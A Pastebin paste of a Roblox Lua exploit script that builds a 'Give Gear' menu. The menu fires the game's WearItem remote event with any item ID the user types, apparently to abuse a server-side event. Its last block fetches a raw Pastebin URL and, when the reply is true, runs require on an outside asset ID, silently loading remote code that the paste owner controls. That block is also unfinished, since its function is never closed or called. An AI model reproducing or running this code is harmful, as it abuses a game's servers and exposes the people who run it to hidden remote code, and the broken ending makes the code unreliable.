coz

heuy

coz
Dec 12th, 2019
162
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.14 KB | None | 0 0
  1. -- Farewell Infortality.
  2. -- Version: 2.82
  3. -- Instances:
  4. local ScreenGui = Instance.new("ScreenGui")
  5. local Frame = Instance.new("Frame")
  6. local TextBox = Instance.new("TextBox")
  7. local GiveGear = Instance.new("TextButton")
  8. local OpenSettings = Instance.new("ImageButton")
  9. local Close = Instance.new("TextButton")
  10. local Settings = Instance.new("Frame")
  11. local ImageButton = Instance.new("ImageButton")
  12. local TextLabel1 = Instance.new("TextLabel")
  13. local X = Instance.new("TextButton")
  14. local TextLabel2 = Instance.new("TextLabel")
  15. local ImageButton_2 = Instance.new("ImageButton")
  16. local OpenHolder = Instance.new("Frame")
  17. local Open = Instance.new("TextButton")
  18. --Properties:
  19. ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  20.  
  21. Frame.Parent = ScreenGui
  22. Frame.BackgroundColor3 = Color3.new(0, 0.666667, 1)
  23. Frame.BorderSizePixel = 0
  24. Frame.Position = UDim2.new(0.372000009, 0, 0.291999996, 0)
  25. Frame.Size = UDim2.new(0, 247, 0, 267)
  26. Frame.Visible = false
  27.  
  28. TextBox.Parent = Frame
  29. TextBox.BackgroundColor3 = Color3.new(0, 0.490196, 0.737255)
  30. TextBox.BorderSizePixel = 0
  31. TextBox.Position = UDim2.new(0.101214573, 0, 0.127340823, 0)
  32. TextBox.Size = UDim2.new(0, 196, 0, 118)
  33. TextBox.Font = Enum.Font.GothamBold
  34. TextBox.PlaceholderColor3 = Color3.new(1, 1, 1)
  35. TextBox.PlaceholderText = "Enter Any Gear ID Here"
  36. TextBox.Text = ""
  37. TextBox.TextColor3 = Color3.new(1, 1, 1)
  38. TextBox.TextScaled = true
  39. TextBox.TextSize = 14
  40. TextBox.TextWrapped = true
  41.  
  42. GiveGear.Name = "GiveGear"
  43. GiveGear.Parent = Frame
  44. GiveGear.BackgroundColor3 = Color3.new(0, 0.490196, 0.737255)
  45. GiveGear.BorderSizePixel = 0
  46. GiveGear.Position = UDim2.new(0.137651816, 0, 0.655430734, 0)
  47. GiveGear.Size = UDim2.new(0, 178, 0, 40)
  48. GiveGear.Font = Enum.Font.GothamBold
  49. GiveGear.Text = "Give Gear"
  50. GiveGear.TextColor3 = Color3.new(1, 1, 1)
  51. GiveGear.TextScaled = true
  52. GiveGear.TextSize = 14
  53. GiveGear.TextWrapped = true
  54.  
  55. OpenSettings.Name = "OpenSettings"
  56. OpenSettings.Parent = Frame
  57. OpenSettings.BackgroundColor3 = Color3.new(1, 1, 1)
  58. OpenSettings.BackgroundTransparency = 1
  59. OpenSettings.BorderSizePixel = 0
  60. OpenSettings.Size = UDim2.new(0, 34, 0, 34)
  61. OpenSettings.Image = "rbxassetid://485882401"
  62.  
  63. Close.Name = "Close"
  64. Close.Parent = Frame
  65. Close.BackgroundColor3 = Color3.new(1, 1, 1)
  66. Close.BackgroundTransparency = 1
  67. Close.BorderSizePixel = 0
  68. Close.Position = UDim2.new(0.894736826, 0, 0, 0)
  69. Close.Size = UDim2.new(0, 26, 0, 27)
  70. Close.Font = Enum.Font.Cartoon
  71. Close.Text = "X"
  72. Close.TextColor3 = Color3.new(1, 0, 0)
  73. Close.TextScaled = true
  74. Close.TextSize = 14
  75. Close.TextWrapped = true
  76.  
  77. Settings.Name = "Settings"
  78. Settings.Parent = ScreenGui
  79. Settings.BackgroundColor3 = Color3.new(0, 0.666667, 1)
  80. Settings.BorderSizePixel = 0
  81. Settings.Position = UDim2.new(0.371572614, 0, 0.291577637, 0)
  82. Settings.Size = UDim2.new(0, 247, 0, 267)
  83. Settings.Visible = false
  84.  
  85. ImageButton.Parent = Settings
  86. ImageButton.BackgroundColor3 = Color3.new(0.937255, 0, 0)
  87. ImageButton.BackgroundTransparency = 1
  88. ImageButton.BorderSizePixel = 0
  89. ImageButton.Position = UDim2.new(0.0412753932, 0, 0.113766849, 0)
  90. ImageButton.Size = UDim2.new(0, 36, 0, 36)
  91. ImageButton.Image = "rbxassetid://222831456"
  92.  
  93. TextLabel1.Name = "TextLabel1"
  94. TextLabel1.Parent = Settings
  95. TextLabel1.BackgroundColor3 = Color3.new(0.180392, 0.180392, 0.180392)
  96. TextLabel1.BackgroundTransparency = 1
  97. TextLabel1.Position = UDim2.new(0.226720646, 0, 0.0936329514, 0)
  98. TextLabel1.Size = UDim2.new(0, 165, 0, 46)
  99. TextLabel1.Font = Enum.Font.GothamBold
  100. TextLabel1.Text = "Black Background"
  101. TextLabel1.TextColor3 = Color3.new(1, 1, 1)
  102. TextLabel1.TextScaled = true
  103. TextLabel1.TextSize = 14
  104. TextLabel1.TextWrapped = true
  105.  
  106. X.Name = "X"
  107. X.Parent = Settings
  108. X.BackgroundColor3 = Color3.new(1, 1, 1)
  109. X.BackgroundTransparency = 1
  110. X.Position = UDim2.new(0.894736826, 0, 0, 0)
  111. X.Size = UDim2.new(0, 26, 0, 25)
  112. X.Font = Enum.Font.Cartoon
  113. X.Text = "X"
  114. X.TextColor3 = Color3.new(1, 0, 0)
  115. X.TextScaled = true
  116. X.TextSize = 14
  117. X.TextWrapped = true
  118.  
  119. TextLabel2.Name = "TextLabel2"
  120. TextLabel2.Parent = Settings
  121. TextLabel2.BackgroundColor3 = Color3.new(1, 1, 1)
  122. TextLabel2.BackgroundTransparency = 1
  123. TextLabel2.Position = UDim2.new(0.226720646, 0, 0.333333313, 0)
  124. TextLabel2.Size = UDim2.new(0, 165, 0, 46)
  125. TextLabel2.Font = Enum.Font.GothamBold
  126. TextLabel2.Text = "Light Blue Background"
  127. TextLabel2.TextColor3 = Color3.new(1, 1, 1)
  128. TextLabel2.TextScaled = true
  129. TextLabel2.TextSize = 14
  130. TextLabel2.TextWrapped = true
  131.  
  132. ImageButton_2.Parent = Settings
  133. ImageButton_2.BackgroundColor3 = Color3.new(0.937255, 0, 0)
  134. ImageButton_2.BackgroundTransparency = 1
  135. ImageButton_2.BorderSizePixel = 0
  136. ImageButton_2.Position = UDim2.new(0.0412753932, 0, 0.349721909, 0)
  137. ImageButton_2.Size = UDim2.new(0, 36, 0, 36)
  138. ImageButton_2.Image = "rbxassetid://222831456"
  139.  
  140. OpenHolder.Name = "OpenHolder"
  141. OpenHolder.Parent = ScreenGui
  142. OpenHolder.BackgroundColor3 = Color3.new(0, 0.666667, 1)
  143. OpenHolder.BorderSizePixel = 0
  144. OpenHolder.Position = UDim2.new(0.00751879718, 0, 0.824534178, 0)
  145. OpenHolder.Size = UDim2.new(0, 154, 0, 39)
  146.  
  147. Open.Name = "Open"
  148. Open.Parent = OpenHolder
  149. Open.BackgroundColor3 = Color3.new(1, 1, 1)
  150. Open.BackgroundTransparency = 1
  151. Open.BorderSizePixel = 0
  152. Open.Position = UDim2.new(-0.000274261867, 0, -0.0205469374, 0)
  153. Open.Size = UDim2.new(0, 154, 0, 39)
  154. Open.Font = Enum.Font.GothamBold
  155. Open.Text = "Open"
  156. Open.TextColor3 = Color3.new(1, 1, 1)
  157. Open.TextScaled = true
  158. Open.TextSize = 14
  159. Open.TextWrapped = true
  160. -- Scripts:
  161. function SCRIPT_HGUA69_FAKESCRIPT() -- GiveGear.LocalScript
  162. local script = Instance.new('LocalScript')
  163. script.Parent = GiveGear
  164. script.Parent.MouseButton1Click:connect(function()
  165. game.ReplicatedStorage.WearItem:FireServer("Shirt", script.Parent.Parent.TextBox.Text, false)
  166. end)
  167.  
  168. end
  169. coroutine.resume(coroutine.create(SCRIPT_HGUA69_FAKESCRIPT))
  170. function SCRIPT_ZTGX85_FAKESCRIPT() -- OpenSettings.LocalScript
  171. local script = Instance.new('LocalScript')
  172. script.Parent = OpenSettings
  173. script.Parent.MouseButton1Click:Connect(function()
  174. script.Parent.Parent.Parent.Frame.Visible = false
  175. script.Parent.Parent.Parent.Settings.Visible = true
  176. end)
  177.  
  178. end
  179. coroutine.resume(coroutine.create(SCRIPT_ZTGX85_FAKESCRIPT))
  180. function SCRIPT_MJEA84_FAKESCRIPT() -- Close.LocalScript
  181. local script = Instance.new('LocalScript')
  182. script.Parent = Close
  183. script.Parent.MouseButton1Click:Connect(function()
  184. script.Parent.Parent.Parent.OpenHolder.Visible = true
  185. script.Parent.Parent.Parent.Settings.Visible = false
  186. script.Parent.Parent.Parent.Frame.Visible = false
  187. end)
  188.  
  189. end
  190. coroutine.resume(coroutine.create(SCRIPT_MJEA84_FAKESCRIPT))
  191. function SCRIPT_QEPS90_FAKESCRIPT() -- Frame.LocalScript
  192. local script = Instance.new('LocalScript')
  193. script.Parent = Frame
  194. local a=game:GetService("UserInputService")local b=script.Parent;local c;local d;local e;local f;local function g(h)local i=h.Position-e;b.Position=UDim2.new(f.X.Scale,f.X.Offset+i.X,f.Y.Scale,f.Y.Offset+i.Y)end;b.InputBegan:Connect(function(h)if h.UserInputType==Enum.UserInputType.MouseButton1 or h.UserInputType==Enum.UserInputType.Touch then c=true;e=h.Position;f=b.Position;h.Changed:Connect(function()if h.UserInputState==Enum.UserInputState.End then c=false end end)end end)b.InputChanged:Connect(function(h)if h.UserInputType==Enum.UserInputType.MouseMovement or h.UserInputType==Enum.UserInputType.Touch then d=h end end)a.InputChanged:Connect(function(h)if h==d and c then g(h)end end)
  195.  
  196. end
  197. coroutine.resume(coroutine.create(SCRIPT_QEPS90_FAKESCRIPT))
  198. function SCRIPT_YDZG67_FAKESCRIPT() -- ImageButton.LocalScript
  199. local script = Instance.new('LocalScript')
  200. script.Parent = ImageButton
  201. local main = script.Parent.Parent.Parent.Frame
  202. local settings = script.Parent.Parent.Parent.Settings
  203. local openholder = script.Parent.Parent.Parent.OpenHolder
  204.  
  205. script.Parent.MouseButton1Click:Connect(function()
  206. main.BackgroundColor3 = Color3.fromRGB(46, 46, 46)
  207. settings.BackgroundColor3 = Color3.fromRGB(46, 46, 46)
  208. openholder.BackgroundColor3 = Color3.fromRGB(46, 46, 46)
  209. script.Parent.Parent.Parent.Frame.TextBox.BackgroundColor3 = Color3.fromRGB(61, 61, 61)
  210. script.Parent.Parent.Parent.Frame.GiveGear.BackgroundColor3 = Color3.fromRGB(61, 61, 61)
  211. end)
  212.  
  213. end
  214. coroutine.resume(coroutine.create(SCRIPT_YDZG67_FAKESCRIPT))
  215. function SCRIPT_PUWO86_FAKESCRIPT() -- X.LocalScript
  216. local script = Instance.new('LocalScript')
  217. script.Parent = X
  218. script.Parent.MouseButton1Click:Connect(function()
  219. script.Parent.Parent.Parent.Frame.Visible = true
  220. script.Parent.Parent.Parent.Settings.Visible = false
  221. end)
  222.  
  223. end
  224. coroutine.resume(coroutine.create(SCRIPT_PUWO86_FAKESCRIPT))
  225. function SCRIPT_MWGX70_FAKESCRIPT() -- Settings.LocalScript
  226. local script = Instance.new('LocalScript')
  227. script.Parent = Settings
  228. local a=game:GetService("UserInputService")local b=script.Parent;local c;local d;local e;local f;local function g(h)local i=h.Position-e;b.Position=UDim2.new(f.X.Scale,f.X.Offset+i.X,f.Y.Scale,f.Y.Offset+i.Y)end;b.InputBegan:Connect(function(h)if h.UserInputType==Enum.UserInputType.MouseButton1 or h.UserInputType==Enum.UserInputType.Touch then c=true;e=h.Position;f=b.Position;h.Changed:Connect(function()if h.UserInputState==Enum.UserInputState.End then c=false end end)end end)b.InputChanged:Connect(function(h)if h.UserInputType==Enum.UserInputType.MouseMovement or h.UserInputType==Enum.UserInputType.Touch then d=h end end)a.InputChanged:Connect(function(h)if h==d and c then g(h)end end)
  229.  
  230. end
  231. coroutine.resume(coroutine.create(SCRIPT_MWGX70_FAKESCRIPT))
  232. function SCRIPT_HIXT70_FAKESCRIPT() -- ImageButton_2.LocalScript
  233. local script = Instance.new('LocalScript')
  234. script.Parent = ImageButton_2
  235. local main = script.Parent.Parent.Parent.Frame
  236. local settings = script.Parent.Parent.Parent.Settings
  237. local openholder = script.Parent.Parent.Parent.OpenHolder
  238.  
  239. script.Parent.MouseButton1Click:Connect(function()
  240. main.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
  241. settings.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
  242. openholder.BackgroundColor3 = Color3.fromRGB(0, 170, 255)
  243. script.Parent.Parent.Parent.Frame.TextBox.BackgroundColor3 = Color3.fromRGB(0, 125, 188)
  244. script.Parent.Parent.Parent.Frame.GiveGear.BackgroundColor3 = Color3.fromRGB(0, 125, 188)
  245. end)
  246.  
  247. end
  248. coroutine.resume(coroutine.create(SCRIPT_HIXT70_FAKESCRIPT))
  249. function SCRIPT_ZAAP90_FAKESCRIPT() -- Open.LocalScript
  250. local script = Instance.new('LocalScript')
  251. script.Parent = Open
  252. script.Parent.MouseButton1Click:Connect(function()
  253. script.Parent.Parent.Parent.OpenHolder.Visible = false
  254. script.Parent.Parent.Parent.Frame.Visible = true
  255. end)
  256.  
  257. end
  258. coroutine.resume(coroutine.create(SCRIPT_ZAAP90_FAKESCRIPT))
  259. function SCRIPT_ELLW70_FAKESCRIPT() -- ScreenGui.LocalScript
  260. local script = Instance.new('LocalScript')
  261. script.Parent = ScreenGui
  262. local HttpService = game:GetService("HttpService")
  263. local url = "https://pastebin.com/raw/iiupH1V3"
  264.  
  265. local function printdata()
  266. local response
  267. local data
  268.  
  269. pcall(function ()
  270. response = HttpService:GetAsync(url)
  271. data = HttpService:JSONDecode(response)
  272. end)
  273. if data == true then
  274. require(4508209018)
  275. else
  276. print("updated")
  277. end
  278.  
  279. end
  280. coroutine.resume(coroutine.create(SCRIPT_ELLW70_FAKESCRIPT))
Advertisement
Add Comment
Please, Sign In to add comment